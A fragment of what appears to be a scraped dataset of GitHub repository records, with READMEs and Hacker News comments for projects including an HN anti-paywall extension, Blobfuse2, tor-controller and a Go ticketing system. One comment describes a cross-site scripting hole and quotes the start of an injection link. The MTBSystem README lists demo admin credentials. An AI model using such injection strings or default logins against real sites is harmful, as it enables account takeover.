minutes of scanning their docs, it seemed less \"protocol\" and more \"configure all the things via clicking around\".I didn't think chatgpt API was available yet?If it's not using chatGPT API I think you should reword/rename everything to be more accurate, including this post, otherwise it stinks of false advertising. I'm sure a lot of people will automatically discount your efforts as soon as they detect the falsehoods.Just my opinion though and I could be wrong.That's cool and all, but I'm probably going to make something to hide it. I also hate paywalls, but (almost) all of them are so easy to circumvent that I usually do it in the inspector.Does anyone remember \"BugMeNot\" ?OK, I need to inquire about `passTheButter()`. A hat tip to \"GreasyFork\"? Or perhaps this is about \"sliding\" past the paywalls?Heads up this is vulnerable to cross site scripting [1]. If someone submits a link like: https://example.com\">\n\nThen simply viewing the hackernews index page with this extension installed will let the submitter execute whatever javascript they want in your logged in hackernews context - no user interaction necessary.[1]: https://github.com/MostlyEmre/hn-anti-paywall/blob/main/scri...This feels very ethically icky to me. 
Folks are working hard to write these articles, and need to get paid.If you don\u2019t like paywalled articles just don\u2019t read them, I don\u2019t think it\u2019s ethically sound to do this.Just my $0.02Needs to show a project license. Otherwise, pretty cool!Imo these types of thing while probably appreciated by many lead to cat-and-mouse games and probably ultimately to hard-paywalls being more widely adopted (I see them a lot already in fact). So what happens then? The utility of these paywall bypass options diminishes until there\u2019s little of value left behind soft-paywallsThere a \u201cmetadata section\u201d on HN submissions?should be the defaultI would like to be sold on imba first.Now waiting for fireship to make a video on it XDFYI, Formidable is a very popular npm package for forms: https://www.npmjs.com/package/formidableVery awesome to learn about a new language in the Node.js ecosystemSome feedback:- I don\u2019t know what Imba is, and likely a lot of other devs don\u2019t either. Your front page should sell me on both Imba and your framework- When I\u2019m personally considering a new framework. I love example projects so I can see how common usecases might look in code. Consider having a few example projects easily discoverable from the home page for folks to sift throughGood luck!Cool!\nActually, cool is an understatement, but I'm too foreign to Imba to provide feedback on that front.\nPretty sure there is enough to spark a discussion, but few bullet points:* Imba focused, yet you're greeted by TS example and the Imba demo is too dense to parse quickly* Not enough short info and too much text to spark my interest for reading* I still want to read something, so I head to GH repo (I have to search for actual core repo, plus I'm greeted by wall of text again) and when I found it, the README is bare :(https://github.com/oven-sh/bun and bun.sh are pleasant reads for me. All of this is subjective and might turn be a turn-off for hardcore folks, but that's not really the target audience for Imba anyway :)And don't fear the direct URL!This is cool, it's always nice to see inertia.js being used.What's the difference between Imba and JS/TS? Is it anything other than alternative sytax for JS?The webpage is not very conclusive on this. export class TaskController extends Controller {\n\n @use(StoreTaskRequest)\n\n store(request: StoreTaskRequest): void {\n\n const description: string = request.get('description')\n\n }\n\n\nI've done enough Spring Boot to know I never want to do Spring Boot in my life again.https://scrimba.com/scrim/czvKPPswImba was used to build Scrimba, the interactive platform to learn coding(mostly web related courses.)It's pretty cool. I tried it out in its nascent stages.I think one of the reasons for imba not having a framework is, it itself is a framework. It has router support, server side rendering strategy and also comes with its own css support. However, I understand here it is using imba language to create a framework which can use other libraries like React and Vue.I\u2019m definitely going to try this out on a personal project soon.I had forgotten about Imba. 
I recall trying it a few years ago, and I loved it, with the exception that it wasn\u2019t capable of doing something that I considered rather crucial at the time.I can\u2019t for the life of me remember what it was, and I know there was an issue filed asking for exactly what I wanted, with positive intent to add the feature, but as time went on I kind of dropped and forgot about Imba.I\u2019m curious to try something in it and see how I fare with however far it\u2019s progressed since then. And I will definitely check this framework out when I do.A web framework. You mean a web framework for the NodeJS environment.You can use JavaScript and node for many things that have little to do with serving web pages, and I was really expecting something different or lower-level since you didn't mention \"web\".That's cool!Looks neat!Something for next time, you might get faster/more visibility if you put the url in the link field. I had to scour for it in the description (not really, but you know)https://formidablejs.orgsidebar is blank on mobileNeat resource - anyone know the default command to set font size on Finder to 16?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "wiatingpub/MTBSystem", "link": "https://github.com/wiatingpub/MTBSystem", "tags": ["go", "go-micro", "golang"], "stars": 520, "description": "\u4f7f\u7528go-micro\u5fae\u670d\u52a1\u5b9e\u73b0\u7684\u5728\u7ebf\u7535\u5f71\u9662\u8ba2\u7968\u7cfb\u7edf", "lang": "Go", "repo_lang": "", "readme": "#### \u91c7\u7528go-micro\u5f00\u53d1\u7684\u7535\u5f71\u7968\u5728\u7ebf\u8d2d\u7968\u7cfb\u7edf\n\n-------------------\n\n\u7cfb\u5217\u535a\u5ba2\uff1a\n- https://mp.weixin.qq.com/s/5bn5ZkAJYR0IEaa5H0bsFg\n- https://mp.weixin.qq.com/s/SQ9HS4wKSz8HtNXHOA5oeg\n- https://mp.weixin.qq.com/s/Y55hfVF4a8A6XOI5OHHlgw\n- https://mp.weixin.qq.com/s/Yo2f-XtbbxI6jrYDTtKxKA\n\n-------------------\n\n#### \u6a21\u5757\u5212\u5206\uff1a\n![\u6a21\u5757\u5212\u5206.png](http://upload-images.jianshu.io/upload_images/3365849-dfaec3d3a064fd8a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)\n\n#### \u670d\u52a1\u5212\u5206\uff1a\n![\u670d\u52a1\u5212\u5206.png](http://upload-images.jianshu.io/upload_images/3365849-005e52ef50e643ae.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)\n\n#### \u6570\u636e\u5e93ER\u56fe\n![\u6570\u636e\u5e93ER\u5173\u7cfb\u56fe.png](http://upload-images.jianshu.io/upload_images/3365849-9c1abcd5fedd1043.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)\n\n#### \u6280\u672f\u65b9\u6848\uff1a\n- \u670d\u52a1\u7aef\uff1ago-micro\n- \u6570\u636e\u5e93\uff1amysql\n- \u7f13 \u5b58\uff1aredis\n- \u524d \u7aef\uff1ael & vue\n- \u670d\u52a1\u5668\uff1a centos 7 & nginx\n- \u672c\u5730\u73af\u5883\uff1ago1.9\n- \u5bb9\u5668\uff1aDocker\n- \u8fdb\u7a0b\u7ba1\u7406\uff1asupervisor\n- \u6570\u636e\u5e93\u5907\u4efd\uff1a\u51b7\u5907\u4efd(rsync+mysqldump)\n\n#### \u5f00\u53d1\u8fdb\u7a0b\uff1a\n- 1\u3001\u642d\u5efa\u597d\u5f00\u53d1\u6846\u67b6 (get)\n- 2\u3001\u6570\u636e\u5e93\u8bbe\u8ba1(get)\n- 3\u3001\u670d\u52a1\u7aef\u5f00\u53d1(get)\n- 4\u3001\u524d\u7aef\u5f00\u53d1(get)\n- 5\u3001\u8054\u8c03(get)\n- 6\u3001\u4f18\u5316(get)\n\n### \u5982\u4f55\u542f\u52a8\u7a0b\u5e8f\uff1a\n- 1\u3001 ./ctrl.sh build #\u6784\u5efadocker\u73af\u5883\uff0c\u6784\u5efa\u5b8c\u6210\u540e\u53ef\u4ee5\u7701\u7565\u8be5\u6b65\u9aa4\n- 2\u3001 ./ctrl.sh run #\u542f\u52a8docker\u5bb9\u5668\u73af\u5883\n- 3\u3001 ./ctrl.sh init conf #\u73af\u5883\u914d\u7f6e\uff0c\u5305\u62ec\u6570\u636e\u5e93 \n- 
4\u3001 ./ctrl.sh init chmod #\u6743\u9650\u8bbe\u5b9a\n- 5\u3001 ./ctrl.sh start #\u542f\u52a8\u5bb9\u5668\n- 6\u3001 ./ctrl.sh login #\u767b\u5f55\u5bb9\u5668\n- 7\u3001 cd /data/deploy/mtbsystem/\n- 8\u3001 bash ./build_local.sh api-srv #\u542f\u52a8api\u670d\u52a1\n- 9\u3001 bash ./build_local.sh all #\u542f\u52a8\u6240\u6709\u670d\u52a1\n\n### \u5982\u4f55\u6dfb\u52a0\u670d\u52a1\n- 1\u3001 \u5728proto\u4e0b\u6dfb\u52a0\u6587\u4ef6\uff0c\u5982cms.ext.proto\n- 2\u3001 \u5728src\u4e0b\u6dfb\u52a0cms-srv\n- 3\u3001 \u5728dockerbase/supervisor\u4e0b\u6dfb\u52a0cms-srv-conf\n- 4\u3001 ./ctrl.sh init conf\n- 5\u3001 ./ctrl.sh login\n- 6\u3001 cd /data/deploy/mtbsystem/\n- 7\u3001 bash ./build_local.sh cms-rv\n\n### mysql\u51b7\u5907\u4efd\n- 1\u3001 \u542f\u52a8\uff1a bash mysql_backup.sh\n- 2\u3001 \u6570\u636e\u6062\u590d\uff1agzip -d mtbsystem-xxxx.sql.gz\n- 3\u3001 \u6570\u636e\u56de\u590d\uff1amysql -u username -p database < \u6587\u4ef6\u540d \n\n### \u6548\u679c\u6f14\u793a\n- 1\u3001\u524d\u53f0\u8bbf\u95ee(\u624b\u673a\u7f51\u7ad9)\uff1ahttp://front.lixifan.cn/\n- 2\u3001\u540e\u53f0\u8bbf\u95ee:http://admin.lixifan.cn/#/login admin 123456 / \u65b0\u5149\u5f71\u57ce xgyc \n\n-------\n\n**Java\u6e90\u7801\u5206\u6790\u3001go\u8bed\u8a00\u5e94\u7528\u3001\u5fae\u670d\u52a1\uff0c\u66f4\u591a\u5e72\u8d27\u6b22\u8fce\u5173\u6ce8\u516c\u4f17\u53f7\uff1a**\n\n![\u516c\u4f17\u53f7.jpg](https://user-gold-cdn.xitu.io/2019/5/29/16aff62fa6acf090?w=258&h=258&f=jpeg&s=16132)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Azure/azure-storage-fuse", "link": "https://github.com/Azure/azure-storage-fuse", "tags": [], "stars": 520, "description": "A virtual file system adapter for Azure Blob storage", "lang": "Go", "repo_lang": "", "readme": "# Blobfuse2 - A Microsoft supported Azure Storage FUSE driver\r\n## About\r\nBlobfuse2 is an open source project developed to provide a virtual filesystem backed by the Azure Storage. It uses the libfuse open source library (fuse3) to communicate with the Linux FUSE kernel module, and implements the filesystem operations using the Azure Storage REST APIs.\r\nThis is the next generation [blobfuse](https://github.com/Azure/azure-storage-fuse)\r\n\r\nBlobfuse2 is stable, and is ***supported by Microsoft*** provided that it is used within its limits documented here. Blobfuse2 supports both reads and writes however, it does not guarantee continuous sync of data written to storage using other APIs or other mounts of Blobfuse2. For data integrity it is recommended that multiple sources do not modify the same blob/file. Please submit an issue [here](https://github.com/azure/azure-storage-fuse/issues) for any issues/feature requests/questions.\r\n\r\n## Features\r\n- Mount an Azure storage blob container or datalake file system on Linux.\r\n- Basic file system operations such as mkdir, opendir, readdir, rmdir, open, \r\n read, create, write, close, unlink, truncate, stat, rename\r\n- Local caching to improve subsequent access times\r\n- Streaming to support reading AND writing large files \r\n- Parallel downloads and uploads to improve access time for large files\r\n- Multiple mounts to the same container for read-only workloads\r\n\r\n## _New BlobFuse2 Health Monitor_\r\nOne of the biggest BlobFuse2 features is our brand new health monitor. It allows customers gain more insight into how their BlobFuse2 instance is behaving with the rest of their machine. 
Visit [here](https://github.com/Azure/azure-storage-fuse/blob/main/tools/health-monitor/README.md) to set it up.\r\n\r\n## Distinctive features compared to blobfuse (v1.x)\r\n- Blobfuse2 is fuse3 compatible (other than Ubuntu-18 and Debian-9, where it still runs with fuse2)\r\n- Support for higher service version offering latest and greatest of azure storage features (supported by azure go-sdk)\r\n- Set blob tier while uploading the data to storage\r\n- Attribute cache invalidation based on timeout\r\n- For flat namesepce accounts, user can configure default permissions for files and folders\r\n- Improved cache eviction algorithm for file cache to control disk footprint of blobfuse2\r\n- Improved cache eviction algorithm for streamed buffers to control memory footprint of blobfuse2\r\n- Utility to convert blobfuse CLI and config parameters to a blobfuse2 compatible config for easy migration\r\n- CLI to mount Blobfuse2 with legacy Blobfuse config and CLI parameters (Refer to Migration guide for this)\r\n- Version check and upgrade prompting \r\n- Option to mount a sub-directory from a container \r\n- CLI to mount all containers (with a allowlist and denylist) in a given storage account\r\n- CLI to list all blobfuse2 mount points\r\n- CLI to unmount one, multiple or all blobfuse2 mountpoints\r\n- Option to dump logs to syslog or a file on disk\r\n- Support for config file encryption and mounting with an encrypted config file via a passphrase (CLI or environment variable) to decrypt the config file\r\n- CLI to check or update a parameter in the encrypted config\r\n- Set MD5 sum of a blob while uploading\r\n- Validate MD5 sum on download and fail file open on mismatch\r\n- Large file writing through write streaming\r\n\r\n ## Blobfuse2 performance compared to blobfuse(v1.x.x)\r\n- 'git clone' operation is 25% faster (tested with vscode repo cloning)\r\n- ResNet50 image classification job is 7-8% faster (tested with 1.3 million images)\r\n- Regular file uploads are 10% faster\r\n- Verified listing of 1-Billion files in a directory (which v1.x does not support)\r\n\r\n\r\n## Download Blobfuse2\r\nYou can install Blobfuse2 by cloning this repository. In the workspace root execute `go build` to build the binary. \r\n\r\n\r\n\r\n## Supported Operations\r\nThe general format of the Blobfuse2 commands is `blobfuse2 [command] [arguments] --[flag-name]=[flag-value]`\r\n* `help` - Help about any command\r\n* `mount` - Mounts an Azure container as a filesystem. The supported containers include\r\n - Azure Blob Container\r\n - Azure Datalake Gen2 Container\r\n* `mount all` - Mounts all the containers in an Azure account as a filesystem. 
The supported storage services include\r\n - [Blob Storage](https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction)\r\n - [Datalake Storage Gen2](https://docs.microsoft.com/en-us/azure/storage/blobs/data-lake-storage-introduction)\r\n* `mount list` - Lists all Blobfuse2 filesystems.\r\n* `secure decrypt` - Decrypts a config file.\r\n* `secure encrypt` - Encrypts a config file.\r\n* `secure get` - Gets value of a config parameter from an encrypted config file.\r\n* `secure set` - Updates value of a config parameter.\r\n* `unmount` - Unmounts the Blobfuse2 filesystem.\r\n* `unmount all` - Unmounts all Blobfuse2 filesystems.\r\n\r\n## Find help from your command prompt\r\nTo see a list of commands, type `blobfuse2 -h` and then press the ENTER key.\r\nTo learn about a specific command, just include the name of the command (For example: `blobfuse2 mount -h`).\r\n\r\n## Usage\r\n- Mount with blobfuse2\r\n * blobfuse2 mount --config-file=\r\n- Mount blobfuse2 using legacy blobfuse config and cli parameters\r\n * blobfuse2 mountv1 \r\n- Mount all containers in your storage account\r\n * blobfuse2 mount all --config-file=\r\n- List all mount instances of blobfuse2\r\n * blobfuse2 mount list\r\n- Unmount blobfuse2\r\n * sudo fusermount3 -u \r\n- Unmount all blobfuse2 instances\r\n * blobfuse2 unmount all \r\n\r\n\r\n## CLI parameters\r\n- Note: Blobfuse2 accepts all CLI parameters that Blobfuse does, but may ignore parameters that are no longer applicable. \r\n- General options\r\n * `--config-file=`: The path to the config file.\r\n * `--log-level=`: The level of logs to capture.\r\n * `--log-file-path=`: The path for the log file.\r\n * `--foreground=true`: Mounts the system in foreground mode.\r\n * `--read-only=true`: Mount container in read-only mode.\r\n * `--default-working-dir`: The default working directory to store log files and other blobfuse2 related information.\r\n * `--disable-version-check=true`: Disable the blobfuse2 version check.\r\n * `----secure-config=true` : Config file is encrypted suing 'blobfuse2 secure` command.\r\n * `----passphrase=` : Passphrase used to encrypt/decrypt config file.\r\n- Attribute cache options\r\n * `--attr-cache-timeout=`: The timeout for the attribute cache entries.\r\n * `--no-symlinks=true`: To improve performance disable symlink support.\r\n- Storage options\r\n * `--container-name=`: The container to mount.\r\n * `--cancel-list-on-mount-seconds=`: Time for which list calls will be blocked after mount. 
( prevent billing charges on mounting)\r\n * `--virtual-directory=true` : Support virtual directories without existence of a special marker blob for block blob account.\r\n * `--subdirectory=` : Subdirectory to mount instead of entire container.\r\n- File cache options\r\n * `--file-cache-timeout=`: Timeout for which file is cached on local system.\r\n * `--tmp-path=`: The path to the file cache.\r\n * `--cache-size-mb=`: Amount of disk cache that can be used by blobfuse.\r\n * `--high-disk-threshold=`: If local cache usage exceeds this, start early eviction of files from cache.\r\n * `--low-disk-threshold=`: If local cache usage comes below this threshold then stop early eviction.\r\n- Stream options\r\n * `--block-size-mb=`: Size of a block to be downloaded during streaming.\r\n- Fuse options\r\n * `--attr-timeout=`: Time the kernel can cache inode attributes.\r\n * `--entry-timeout=`: Time the kernel can cache directory listing.\r\n * `--negative-timeout=`: Time the kernel can cache non-existance of file or directory.\r\n * `--allow-other`: Allow other users to have access this mount point.\r\n * `--disable-writeback-cache=true`: Disallow libfuse to buffer write requests if you must strictly open files in O_WRONLY or O_APPEND mode.\r\n * `--ignore-open-flags=true`: Ignore the append and write only flag since O_APPEND and O_WRONLY is not supported with writeback caching.\r\n\r\n\r\n## Environment variables\r\n- General options\r\n * `AZURE_STORAGE_ACCOUNT`: Specifies the storage account to be connected.\r\n * `AZURE_STORAGE_ACCOUNT_TYPE`: Specifies the account type 'block' or 'adls'\r\n * `AZURE_STORAGE_ACCOUNT_CONTAINER`: Specifies the name of the container to be mounted\r\n * `AZURE_STORAGE_BLOB_ENDPOINT`: Specifies the blob endpoint to use. Defaults to *.blob.core.windows.net, but is useful for targeting storage emulators.\r\n * `AZURE_STORAGE_AUTH_TYPE`: Overrides the currently specified auth type. Case insensitive. Options: Key, SAS, MSI, SPN\r\n- Account key auth:\r\n * `AZURE_STORAGE_ACCESS_KEY`: Specifies the storage account key to use for authentication.\r\n- SAS token auth:\r\n * `AZURE_STORAGE_SAS_TOKEN`: Specifies the SAS token to use for authentication.\r\n- Managed Identity auth:\r\n * `AZURE_STORAGE_IDENTITY_CLIENT_ID`: Only one of these three parameters are needed if multiple identities are present on the system.\r\n * `AZURE_STORAGE_IDENTITY_OBJECT_ID`: Only one of these three parameters are needed if multiple identities are present on the system.\r\n * `AZURE_STORAGE_IDENTITY_RESOURCE_ID`: Only one of these three parameters are needed if multiple identities are present on the system.\r\n * `MSI_ENDPOINT`: Specifies a custom managed identity endpoint, as IMDS may not be available under some scenarios. Uses the `MSI_SECRET` parameter as the `Secret` header.\r\n * `MSI_SECRET`: Specifies a custom secret for an alternate managed identity endpoint.\r\n- Service Principal Name auth:\r\n * `AZURE_STORAGE_SPN_CLIENT_ID`: Specifies the client ID for your application registration\r\n * `AZURE_STORAGE_SPN_TENANT_ID`: Specifies the tenant ID for your application registration\r\n * `AZURE_STORAGE_AAD_ENDPOINT`: Specifies a custom AAD endpoint to authenticate against\r\n * `AZURE_STORAGE_SPN_CLIENT_SECRET`: Specifies the client secret for your application registration.\r\n- Proxy Server:\r\n * `http_proxy`: The proxy server address. Example: `10.1.22.4:8080`. \r\n * `https_proxy`: The proxy server address when https is turned off forcing http. 
Example: `10.1.22.4:8080`.\r\n\r\n## Config file\r\n- See [this](./sampleFileCacheConfig.yaml) sample config file.\r\n- See [this](./setup/baseConfig.yaml) config file for a list and description of all possible configurable options in blobfuse2. \r\n\r\n***Please note: do not use quotations `\"\"` for any of the config parameters***\r\n\r\n## Frequently Asked Questions\r\n- How do I generate a SAS with permissions for rename?\r\naz cli has a command to generate a sas token. Open a command prompt and make sure you are logged in to az cli. Run the following command and the sas token will be displayed in the command prompt.\r\naz storage container generate-sas --account-name --account-key -n --permissions dlrwac --start --expiry \r\n- Why do I get EINVAL on opening a file with WRONLY or APPEND flags?\r\nTo improve performance, Blobfuse2 by default enables writeback caching, which can produce unexpected behavior for files opened with WRONLY or APPEND flags, so Blobfuse2 returns EINVAL on open of a file with those flags. Either use disable-writeback-caching to turn off writeback caching (can potentially result in degraded performance) or ignore-open-flags (replace WRONLY with RDWR and ignore APPEND) based on your workload. \r\n- How to mount blobfuse2 inside a container?\r\nRefer to 'docker' folder in this repo. It contains a sample 'Dockerfile'. If you wish to create your own container image, try 'buildandruncontainer.sh' script, it will create a container image and launch the container using current environment variables holding your storage account credentials.\r\n \r\n## Un-Supported File system operations\r\n- mkfifo : fifo creation is not supported by blobfuse2 and this will result in \"function not implemented\" error\r\n- chown : Change of ownership is not supported by Azure Storage hence Blobfuse2 does not support this.\r\n- Creation of device files or pipes is not supported by Blobfuse2.\r\n- Blobfuse2 does not support extended-attributes (x-attrs) operations\r\n\r\n## Un-Supported Scenarios\r\n- Blobfuse2 does not support overlapping mount paths. While running multiple instances of Blobfuse2 make sure each instance has a unique and non-overlapping mount point.\r\n- Blobfuse2 does not support co-existance with NFS on same mount path. Behaviour in this case is undefined.\r\n- For block blob accounts, where data is uploaded through other means, Blobfuse2 expects special directory marker files to exist in container. In absence of this\r\n few file operations might not work. For e.g. if you have a blob 'A/B/c.txt' then special marker files shall exists for 'A' and 'A/B', otherwise opening of 'A/B/c.txt' will fail.\r\n Once a 'ls' operation is done on these directories 'A' and 'A/B' you will be able to open 'A/B/c.txt' as well. Possible workaround to resolve this from your container is to either\r\n\r\n create the directory marker files manually through portal or run 'mkdir' command for 'A' and 'A/B' from blobfuse. Refer [me](https://github.com/Azure/azure-storage-fuse/issues/866) \r\n for details on this.\r\n\r\n## Limitations\r\n- In case of BlockBlob accounts, ACLs are not supported by Azure Storage so Blobfuse2 will by default return success for 'chmod' operation. However it will work fine for Gen2 (DataLake) accounts.\r\n\r\n\r\n### Syslog security warning\r\nBy default, Blobfuse2 will log to syslog. The default settings will, in some cases, log relevant file paths to syslog. \r\nIf this is sensitive information, turn off logging or set log-level to LOG_ERR. 
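\r\n\r\nAs a quick recap of the options above, here is a minimal mount session driven entirely by the environment variables and CLI flags documented in this README. It is a sketch, not an official recipe: it assumes key-based auth, that the mount and cache directories already exist, and that the account, key and container names are placeholders; if your setup uses a config file, the same values can be placed there instead.\r\n\r\n```shell\r\n# storage credentials via the documented environment variables (placeholder values)\r\nexport AZURE_STORAGE_ACCOUNT=mystorageaccount\r\nexport AZURE_STORAGE_ACCESS_KEY='<account-key>'\r\nexport AZURE_STORAGE_ACCOUNT_CONTAINER=mycontainer\r\nexport AZURE_STORAGE_AUTH_TYPE=Key\r\n\r\n# mount the container and use it like a local directory\r\nblobfuse2 mount /mnt/blob --tmp-path=/tmp/blobfuse2-cache\r\nls /mnt/blob\r\n\r\n# unmount when done\r\nblobfuse2 unmount /mnt/blob\r\n```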
\r\n\r\n\r\n## License\r\nThis project is licensed under MIT.\r\n \r\n## Contributing\r\nThis project welcomes contributions and suggestions. Most contributions \r\nrequire you to agree to a Contributor License Agreement (CLA) declaring \r\nthat you have the right to, and actually do, grant us the rights to use \r\nyour contribution. For details, visit https://cla.microsoft.com.\r\n\r\nWhen you submit a pull request, a CLA-bot will automatically determine \r\nwhether you need to provide a CLA and decorate the PR appropriately \r\n(e.g., label, comment). Simply follow the instructions provided by the \r\nbot. You will only need to do this once across all repos using our CLA.\r\n\r\nThis project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/).\r\nFor more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or\r\ncontact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.\r\n\r\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kragniz/tor-controller", "link": "https://github.com/kragniz/tor-controller", "tags": ["kubernetes", "tor"], "stars": 520, "description": "Run Tor onion services on Kubernetes", "lang": "Go", "repo_lang": "", "readme": "
tor-controller\n==============
\n\n[![Build Status](https://img.shields.io/travis-ci/kragniz/tor-controller.svg?style=flat-square)](https://travis-ci.org/kragniz/tor-controller)\n\nTor is an anonymity network that provides:\n\n- privacy\n- enhanced tamperproofing\n- freedom from network surveillance\n- NAT traversal\n\ntor-controller allows you to create `OnionService` resources in kubernetes.\nThese services are used similarly to standard kubernetes services, but they\nonly serve traffic on the tor network (available on `.onion` addresses).\n\nSee [this page](https://www.torproject.org/docs/onion-services.html.en) for\nmore information about onion services.\n\ntor-controller creates the following resources for each OnionService:\n\n- a service, which is used to send traffic to application pods\n- tor pod, which contains a tor daemon to serve incoming traffic from the tor\n network, and a management process that watches the kubernetes API and\n generates tor config, signaling the tor daemon when it changes\n- rbac rules\n\n
\n\nInstall\n-------\n\nInstall tor-controller:\n\n $ kubectl apply -f hack/install.yaml\n\nQuickstart with random address\n------------------------------\n\nCreate an onion service, `onionservice.yaml`:\n\n```yaml\napiVersion: tor.k8s.io/v1alpha1\nkind: OnionService\nmetadata:\n name: basic-onion-service\nspec:\n version: 2\n selector:\n app: example\n ports:\n - publicPort: 80\n targetPort: 80\n```\n\nApply it:\n\n $ kubectl apply -f onionservice.yaml\n\nView it:\n\n```bash\n$ kubectl get onionservices -o=custom-columns=NAME:.metadata.name,HOSTNAME:.status.hostname\nNAME HOSTNAME\nbasic-onion-service h7px2yyugjqkztrb.onion\n```\n\nExposing a deployment with a fixed address\n------------------------------------------\n\nCreate some deployment to test against, in this example we'll deploy an echoserver. Create `echoserver.yaml`:\n\n```yaml\napiVersion: apps/v1\nkind: Deployment\nmetadata:\n name: http-app\nspec:\n replicas: 2\n selector:\n matchLabels:\n app: http-app\n template:\n metadata:\n labels:\n app: http-app\n spec:\n containers:\n - name: http-app\n image: gcr.io/google_containers/echoserver:1.8\n ports:\n - containerPort: 8080\n```\nApply it:\n\n $ kubectl apply -f echoserver.yaml\n\nFor a fixed address, we need a private key. This should be kept safe, since\nsomeone can impersonate your onion service if it is leaked.\nGenerate an RSA private key (only valid for v2 onion services, v3 services use Ed25519 instead):\n\n $ openssl genrsa -out private_key 1024\n\nPut your private key into a secret:\n\n $ kubectl create secret generic example-onion-key --from-file=private_key\n\nCreate an onion service, `onionservice.yaml`, referencing the private key we just created:\n\n```yaml\napiVersion: tor.k8s.io/v1alpha1\nkind: OnionService\nmetadata:\n name: example-onion-service\nspec:\n version: 2\n selector:\n app: http-app\n ports:\n - targetPort: 8080\n publicPort: 80\n privateKeySecret:\n name: example-onion-key\n key: private_key\n```\n\nApply it:\n\n $ kubectl apply -f onionservice.yaml\n\nList active OnionServices:\n\n```\n$ kubectl get onionservices -o=custom-columns=NAME:.metadata.name,HOSTNAME:.status.hostname\nNAME HOSTNAME\nexample-onion-service s2c6qry5bj57vyms.onion\n```\n\nThis service should now be accessable from any tor client,\nfor example [Tor Browser](https://www.torproject.org/projects/torbrowser.html.en):\n\n
(screenshot: the onion service opened in Tor Browser)
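\n\nIf you would rather verify the service from a terminal than from Tor Browser, the same hostname can be fetched through a local tor daemon. This is a minimal sketch under a couple of assumptions: a tor client is running on the machine with its default SOCKS listener on 127.0.0.1:9050, and the hostname is the one reported by `kubectl get onionservices` above.\n\n```bash\n# resolve and fetch the .onion address through the local tor SOCKS proxy\ncurl --socks5-hostname 127.0.0.1:9050 http://s2c6qry5bj57vyms.onion/\n```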
\n\nRandom service names\n--------------------\n\nIf `spec.privateKeySecret` is not specified, tor-controller will start a service with a random name.\nThis will remain in use until the tor-daemon pod restarts or is terminated for some other reason.\n\nOnion service versions\n----------------------\n\nThe `spec.version` field specifies which onion protocol to use.\nv2 is the classic and well supported, v3 is the new replacement.\n\nThe biggest difference from a user's point of view is the length of addresses. v2\nservice names are short, like `x3yvl2svtqgzhcyz.onion`. v3 are longer, like\n`ljgpby5ba3xi5osslpdvqsumdb4sbclb2amxtm6a3cwnq7w7sj72noid.onion`.\n\ntor-controller defaults to using v3 if `spec.version` is not specified.\n\n\nUsing with nginx-ingress\n------------------------\n\ntor-controller on its own simply directs TCP traffic to a backend service.\nIf you want to serve HTTP stuff, you'll probably want to pair it with\nnginx-ingress or some other ingress controller.\n\nTo do this, first install nginx-ingress normally. Then point an onion service\nat the nginx-ingress-controller, for example:\n\n```yaml\napiVersion: tor.k8s.io/v1alpha1\nkind: OnionService\nmetadata:\n name: nginx-onion-service\nspec:\n version: 2\n selector:\n app: nginx-ingress-controller\n name: nginx-ingress-controller\n ports:\n - publicPort: 80\n targetPort: 80\n name: http\n privateKeySecret:\n name: nginx-onion-key\n key: private_key\n```\n\nThis can then be used in the same way any other ingress is. Here's a full\nexample, with a default backend and a subdomain:\n\n```yaml\napiVersion: apps/v1\nkind: Deployment\nmetadata:\n name: http-app\nspec:\n replicas: 2\n selector:\n matchLabels:\n app: http-app\n template:\n metadata:\n labels:\n app: http-app\n spec:\n containers:\n - name: http-app\n image: gcr.io/google_containers/echoserver:1.8\n ports:\n - containerPort: 8080\n---\napiVersion: v1\nkind: Service\nmetadata:\n name: http-app\n labels:\n app: http-app\nspec:\n ports:\n - port: 80\n protocol: TCP\n targetPort: 8080\n selector:\n app: http-app\n---\napiVersion: extensions/v1beta1\nkind: Ingress\nmetadata:\n name: http-app\n annotations:\n nginx.ingress.kubernetes.io/rewrite-target: /\nspec:\n backend:\n serviceName: default-http-backend\n servicePort: 80\n rules:\n - host: echoserver.h7px3yyugjqkztrb.onion\n http:\n paths:\n - path: /\n backend:\n serviceName: http-app\n servicePort: 8080\n```\n", "readme_type": "markdown", "hn_comments": "Good stuff! I wish there was some good in-depth and well explained article on how to write or hook up your own controller. I mean, there is the official doc for this but it's not really a hands-on IMHO.If all you need is a Go library for connecting to a Tor daemon and adding/removing hidden services: https://godoc.org/github.com/wybiral/torgoGreat documentation!I particularly like that you mentioned \"NAT Traversal\" as one of the benefits of hidden services.I think that's an overlooked feature that would in many cases be enough of a reason for one to use them, even without caring for the added privacy.If you include this in the image, then your machine can talk to .onion addresses natively across the system, without having to use torify or socks5 proxy setups. 
This enables in doing things like sending logs to *.onion , having an OOB at a different .onion , and more.I send my IoT traffic to a MQTT onionseerver I run.https://cdn.hackaday.io/files/12985555550240/Linux%20DNS%20R...Nice logo!", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "namsral/flag", "link": "https://github.com/namsral/flag", "tags": [], "stars": 520, "description": "Parse flags, environment variables and config files", "lang": "Go", "repo_lang": "", "readme": "Flag\n===\n\nFlag is a drop in replacement for Go's flag package with the addition to parse files and environment variables. If you support the [twelve-factor app methodology][], Flag complies with the third factor; \"Store config in the environment\".\n\n[twelve-factor app methodology]: http://12factor.net\n\nAn example using a gopher:\n\n```go\n$ cat > gopher.go\n package main\n\n import (\n \"fmt\"\n \t\"github.com/namsral/flag\"\n\t)\n \n func main() {\n \tvar age int\n\tflag.IntVar(&age, \"age\", 0, \"age of gopher\")\n\tflag.Parse()\n\tfmt.Print(\"age:\", age)\n }\n$ go run gopher.go -age 1\nage: 1\n```\n\nSame code but using an environment variable:\n\n```go\n$ export AGE=2\n$ go run gopher.go\nage: 2\n```\n 